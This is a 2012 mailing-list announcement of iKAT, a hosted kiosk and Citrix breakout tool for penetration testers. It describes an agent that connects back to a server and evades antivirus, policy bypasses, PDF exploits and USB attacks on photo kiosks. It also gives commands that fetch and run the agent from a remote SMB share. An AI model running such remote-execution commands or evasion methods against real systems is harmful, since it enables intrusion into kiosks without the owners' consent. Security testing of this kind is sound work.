iKAT 2012 - Interactive Kiosk Attack Tool Beating Heart Edition -----------------------------------------------------------------
It is with great pleasure that i would like to release this years edition of iKAT - The Interactive Kiosk Attack Tool. http://ikat.ha.cked.net *.ha.cked.net to bypass pesky blacklist filters ( also available on https ) Over the last 5 years iKAT has grown in popularity and is now the de-facto standard for conducting penetration tests against 'controlled' browser environments such as Citrix Terminals, Kiosks, WebTV's and even In flight Entertainment systems. iKAT is visited by over 100 confirmed Kiosks or Citrix environments per-day and is currently spawning on average 3 system shells per hour. iKAT is a 100% free SaaS website that you can visit from any browser environment. iKAT will attempt to exploit the browser and spawn a local shell for you. This years version has had a major re-work on both the design/layout and the underlying technology and aims to provide the smoothest, fruitful experience yet. I do hope you all enjoy the sleepless nights and hard work that has been invested into iKAT 2012. iKAT 2012 will be officially released + Demo'd at XCON 2012 in Beijing China next week. New Features of iKAT 2012: Layout: ----------------------------------------------- During Defcon 19 i was approached by a sprightly girl with bright red hair who asked me if i was "that Kiosk guy?" I replied yes? And she proceeded to abuse my HTML development skill, and told me that although iKAT is technically a great tool - it resembles a 12year old's wordpress site. Turns out this sprightly (and inebriated) girl was a web developer, so i took her name-card and after the conference emailed her and demanded that since she ridiculed my development skills, she should write me a new layout for iKAT, for free. It is with great pleasure that i can say that iKAT is now "nice" looking, easier to navigate, Web 2.0, and fully W3C compliant! Big thanks to Melanie Wilke - http://melaniewilke.com, for her donation of both time and effort. Client / Server Model: ------------------------------ One of the largest technological changes in iKAT is the implementation of a client/server model. Kiosk vendors and AV vendors have been quick to blacklist and block my tools and the success rate of previous iKAT versions has been decreasing, so the only approach i found to work was to drop a small iKAT Agent and connect back to the iKAT server. The iKAT server will do all of the post exploitation work for you! This provides a much higher rate of success as i am able to kill and evade AV, there is also a much higher chance of not only spawning shells - but spawning system shells. Over time the post exploitation methods will be refined to help you stay one step ahead. The iKAT agent has been included in each of the payloads and exploitation methods so nothing changes in how you use iKAT. New Tools / Exploits / Bug Fixes: ------------------------------------------------- A raft of new tools and exploits have been developed for iKAT 2012 to increase the attacks available to you. These include: Dynamic In-Memory Process Patching to generically defeat Windows Local Group Policy Additional SRP Bypass Techniques Top #10 PDF exploits pre-loaded with iKAT agents Available DLL content Upgraded/Improved/Fixed tools. New Browser Crashes: ----------------------------------------------- The fuzzing servers have been working overtime finding new (none-exploitable) crash conditions for popular browsers. These exploits simply allow you to crash and close a browser, often leading to the underlying desktop being exposed. I dubbed this exploit "Emo-Kiosking", and although crashing the browser may sound crude - it has proven to be the most effective exploit against controlled browser environments as the end-goal is to escape the browser. Samba Service --------------------------------------------- iKAT now contains a world readable SMB share hosting the iKAT agents in DLL and EXE form. Hosted at \\120.138.22.77\ikat this share contains ikat.exe and ikat.dll and a suite of other tools. This allows you to simply run \\120.138.22.77\ikat\ikat.exe from the command line to load the iKAT agent. Alternatively you can regsvr32 \\120.138.22.77\ikat\ikat.dll to complete the same task. This is incredibly handy when you are able to execute commands, but cannot download a file. Updated PhotoKAT: ----------------------------------------------- PhotoKAT is the lesser-known Photo Kiosk exploitation tool. This tool should be extracted to a USB Key or Memory Card and plugged into Photo Kiosk. PhotoKAT now attempts many new generic exploits against common Photo Kiosk terminals. Attacks include: .LNK Shortcut Exploit to the iKAT Agent on the iKAT SMB server DLL Hijacking of common libraries Autorun.inf Malicious PDF Files loaded with iKAT Agents A suite of iKAT Tools Donation: ----------------------------------------------- iKAT is a labor of love, and everything from the hosting, design, research and exploits are donated by the community. However there are some things that cost money, like our code-signing certificate, and often real cash is required. If you have ever used iKAT to pop shells on a job, or the project has helped you in some way - please donate to the cause. Every dollar helps and will go directly towards fighting the good fight. My thanks to everyone who has helped the iKAT project over the years, their names are included on the website. Thanks Paul Craig _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/